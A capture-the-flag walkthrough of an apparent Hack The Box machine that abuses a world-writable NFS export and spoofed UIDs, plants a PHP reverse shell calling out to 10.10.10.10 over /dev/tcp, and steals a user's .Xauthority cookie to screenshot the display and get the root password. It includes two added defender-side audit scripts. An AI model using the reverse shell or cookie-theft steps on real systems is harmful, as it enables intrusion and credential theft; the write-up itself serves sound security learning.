
This is quite an interesting machine, and a realistic one; I personally learnt something new while solving it.
### Enumeration

The NFS port is open; you can follow the [hacktricks](https://book.hacktricks.xyz/network-services-pentesting/nfs-service-pentesting) cheatsheet for NFS. I use `showmount` to list the directories the server exports.

We have `/home/ross` and `/var/www/html`.
Now I mount the folders with the commands:
```bash!
sudo mkdir -p /mnt/ross_folder /mnt/web_folder
sudo mount -t nfs 10.10.11.191:/home/ross /mnt/ross_folder -o nolock
sudo mount -t nfs 10.10.11.191:/var/www/html /mnt/web_folder -o nolock
```

Now let's take one last look at the NFS permissions on those folders so that we know where to go from here. We do this with nmap's `nfs-ls` script:
```bash!
sudo nmap 10.10.11.191 --script nfs-ls
```
Instead of nmap you can use metasploit's `scanner/nfs/nfsmount` module.

From the image above we can tell that we have read and write permission on `/var/www/html`. We can use this to our advantage to get initial access to the target machine.
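As an added, defender-side example (not part of the original writeup): a small Python audit of `/etc/exports` that flags the settings behind this finding, namely exports open to every host and exports that, with the default AUTH_SYS security and no `all_squash`, trust whatever UID/GID the client sends. The sample exports file is constructed to mirror the situation on the box next to a hardened export; the box's real configuration is not on the page.

```python
"""Audit /etc/exports for exports that let a client choose its own UID/GID.

Added example, not part of the original writeup.  The sample file below is
constructed: a world-exported, writable share and a read-only home next to a
hardened export.  It is not the box's real /etc/exports.
"""
import re
from dataclasses import dataclass, field
from typing import List, Set

SAMPLE_EXPORTS = """\
# constructed sample /etc/exports
/var/www/html *(rw,sync,no_subtree_check)
/home/ross    *(ro,sync,no_subtree_check)
/srv/share    10.0.0.0/24(rw,sync,all_squash,anonuid=65534,anongid=65534,sec=krb5p)
"""

# "host(opt,opt)" or bare "host"; an empty host means every client
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


@dataclass
class Export:
    path: str
    host: str
    options: Set[str]
    findings: List[str] = field(default_factory=list)


def parse_exports(text: str) -> List[Export]:
    """Parse exports(5) lines into one Export per (path, client) pair."""
    exports: List[Export] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        for client in clients or ["*"]:  # no client spec = exported to everyone
            m = CLIENT_RE.match(client)
            if m is None:
                continue
            host = m.group(1) or "*"
            opts = {o.strip() for o in (m.group(2) or "").split(",") if o.strip()}
            exports.append(Export(path, host, opts))
    return exports


def audit(export: Export) -> List[str]:
    """Attach findings describing who can act as whom on this export."""
    opts = export.options
    squashed = "all_squash" in opts
    kerberos = any(o.startswith("sec=krb5") for o in opts)  # krb5/krb5i/krb5p
    if export.host == "*":
        export.findings.append("no client restriction: any host may mount it")
    if "no_root_squash" in opts:
        export.findings.append("no_root_squash: client root is root on the share")
    if not squashed and not kerberos:
        what = "read and write" if "rw" in opts else "read"
        export.findings.append(
            "AUTH_SYS without all_squash: the server trusts the UID/GID the "
            f"client sends, so a client that creates a matching UID can {what} "
            "as the owning user"
        )
    return export.findings


def audit_exports(text: str) -> List[Export]:
    """Parse and audit a whole exports file."""
    exports = parse_exports(text)
    for export in exports:
        audit(export)
    return exports


if __name__ == "__main__":
    for export in audit_exports(SAMPLE_EXPORTS):
        status = "OK" if not export.findings else "WEAK"
        print(f"{status:4} {export.path} -> {export.host} {sorted(export.options)}")
        for finding in export.findings:
            print(f"       - {finding}")
```

Run against the real file with `audit_exports(open("/etc/exports").read())`. The fix the third sample line shows is the usual one: restrict the client list, add `all_squash` (or at least `root_squash`, which is the default) so client UIDs are mapped to an anonymous account, or require Kerberos with `sec=krb5p` so the server authenticates users instead of trusting numbers from the wire.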
### Initial Foothold
To be able to read and write in `/var/www/html` we need to be a user with UID 2017: with the default AUTH_SYS security the NFS server simply trusts the UID and GID the client sends, so we create a user on our own machine and give it that UID.
```bash!
sudo useradd pewpew
sudo usermod -u 2017 pewpew
sudo groupmod -g 2017 pewpew
su pewpew
```

I'll create a new file named `new.php` in the mounted `/mnt/web_folder` and give it the malicious code that will be executed and provide a reverse shell once the page is visited:
```php!
<?php system("bash -c 'bash -i &>/dev/tcp/10.10.10.10/1337 <&1'");?>
```
I set a listener on port 1337 and trigger the reverse shell by requesting the file with curl.

Voila! I got user access.

The flag is found in `/home/alex/user.txt`
### Privilege Escalation

First I try to check the user's privileges, but it asks for a password, which unfortunately we do not know. Digging a bit more, I was able to see that the user `ross` is logged in:

And we do have access to Ross's home folder. While looking through it there is a `Passwords.kdbx` file, which is a KeePass database, so I tried cracking that but couldn't even convert it to a john-readable hash.


Taking a closer look at the files inside Ross's home directory we can see that he has a `.Xauthority` file.

You can read [xauthority-explained](https://www.systranbox.com/what-is-xauthority-file-linux/) for some basic information about what the .Xauthority file does. In short, it stores the authentication cookie the X server hands out when the user logs in; whoever holds the cookie for a display can talk to that display. In this case we can try using Ross's cookie in place of Alex's, which gives us access to Ross's session.
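An added example (not from the original writeup) that parses the `.Xauthority` format to show what the file actually holds, and checks whether it is readable by other local users. Each entry is a family code followed by four length-prefixed fields: address, display number, auth name and auth data. The entry used here is built by `build_sample_xauthority` and is constructed: `sample-host` and the sixteen cookie bytes are placeholders, not data from the box, and the cookie is never printed.

```python
"""Parse an .Xauthority file and report what it holds, with the cookie redacted.

Added example, not part of the original writeup.  The entry built here is
constructed: 'sample-host' and the 16 cookie bytes are placeholders.
"""
import os
import stat
import struct
import tempfile
from dataclasses import dataclass
from typing import Dict, List

# Xauth family codes (values from X11/Xauth.h)
FAMILY_NAMES = {0: "FamilyInternet", 6: "FamilyInternet6",
                256: "FamilyLocal", 65535: "FamilyWild"}


@dataclass
class XauthEntry:
    family: int
    address: str
    display: str
    name: str
    cookie_len: int  # the cookie itself is a bearer secret and is not kept


def _field(data: bytes) -> bytes:
    """Length-prefixed field as used by the .Xauthority format (big-endian u16)."""
    return struct.pack(">H", len(data)) + data


def build_sample_xauthority() -> bytes:
    """One FamilyLocal entry for display :0 with MIT-MAGIC-COOKIE-1 (constructed)."""
    cookie = bytes(range(16))  # placeholder bytes, not a real cookie
    return (struct.pack(">H", 256) + _field(b"sample-host") + _field(b"0")
            + _field(b"MIT-MAGIC-COOKIE-1") + _field(cookie))


def _read_field(buf: bytes, off: int):
    (n,) = struct.unpack_from(">H", buf, off)
    off += 2
    return buf[off:off + n], off + n


def parse_xauthority(buf: bytes) -> List[XauthEntry]:
    """Walk the entries: family, address, display number, auth name, auth data."""
    entries: List[XauthEntry] = []
    off = 0
    while off < len(buf):
        (family,) = struct.unpack_from(">H", buf, off)
        off += 2
        address, off = _read_field(buf, off)
        number, off = _read_field(buf, off)
        name, off = _read_field(buf, off)
        data, off = _read_field(buf, off)
        entries.append(XauthEntry(family, address.decode("ascii", "replace"),
                                  number.decode("ascii", "replace"),
                                  name.decode("ascii", "replace"), len(data)))
    return entries


def describe_xauthority(path: str) -> Dict[str, object]:
    """Permission check plus a redacted summary of the cookies the file grants."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    with open(path, "rb") as fh:
        entries = parse_xauthority(fh.read())
    return {
        "mode": mode,
        "readable_by_others": bool(mode & (stat.S_IRGRP | stat.S_IROTH)),
        "entries": entries,
    }


def write_sample_file(mode: int = 0o644) -> str:
    """Write the constructed entry to a temp file with the given mode; returns its path."""
    fd, path = tempfile.mkstemp(prefix="xauthority-sample-")
    with os.fdopen(fd, "wb") as fh:
        fh.write(build_sample_xauthority())
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    path = write_sample_file(0o644)
    report = describe_xauthority(path)
    print(f"{path}: mode {report['mode']:04o}, "
          f"readable by others: {report['readable_by_others']}")
    for e in report["entries"]:
        print(f"  {FAMILY_NAMES.get(e.family, e.family)} {e.address}:{e.display} "
              f"{e.name} ({e.cookie_len}-byte cookie, redacted)")
    os.unlink(path)
```

Point it at a real file with `describe_xauthority(os.path.expanduser("~/.Xauthority"))`. Mode 0600 is the baseline for this file, but as the writeup shows it is not enough on its own: when the home directory is exported over NFS that trusts client UIDs, the file mode is checked against a UID the client chose, so the export side has to be fixed as well.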
To achieve this we first create a user with UID 1001, which allows us to read the files.
```bash!
sudo useradd test
sudo usermod -u 1001 test
sudo groupmod -g 1001 test
su test
```
Then we run the following
```bash!
base64 /mnt/ross_folder/.Xauthority > /tmp/xauth
cd /tmp && python3 -m http.server
```
This writes a base64-encoded copy of the file to `/tmp` and starts an HTTP server so that you can download it from the target (decoding it back to `/tmp/xauth` there).

Then I set it as my session by exporting the variable, `export XAUTHORITY=/tmp/xauth`, so that the X tools use Ross's cookie. I now use xwd to take a screenshot of Ross's display with the command:
```bash!
xwd -root -screen -silent -display :0 > ~/out.xwd
```
The `:0` is the value of the `FROM` column, which in our case is `:0`. After taking the screenshot I host an HTTP server with python again from `/home/alex`, or move the image to `/var/www/html/`, so that I can download and view it.

From here we get the root password, which we use to log in as root on the target.

ROOTED! PEWPEW 🙃 GREAT WORK TO [polarbear](https://app.hackthebox.com/users/159204) & [C4rm3l0](https://app.hackthebox.com/users/458049)
---
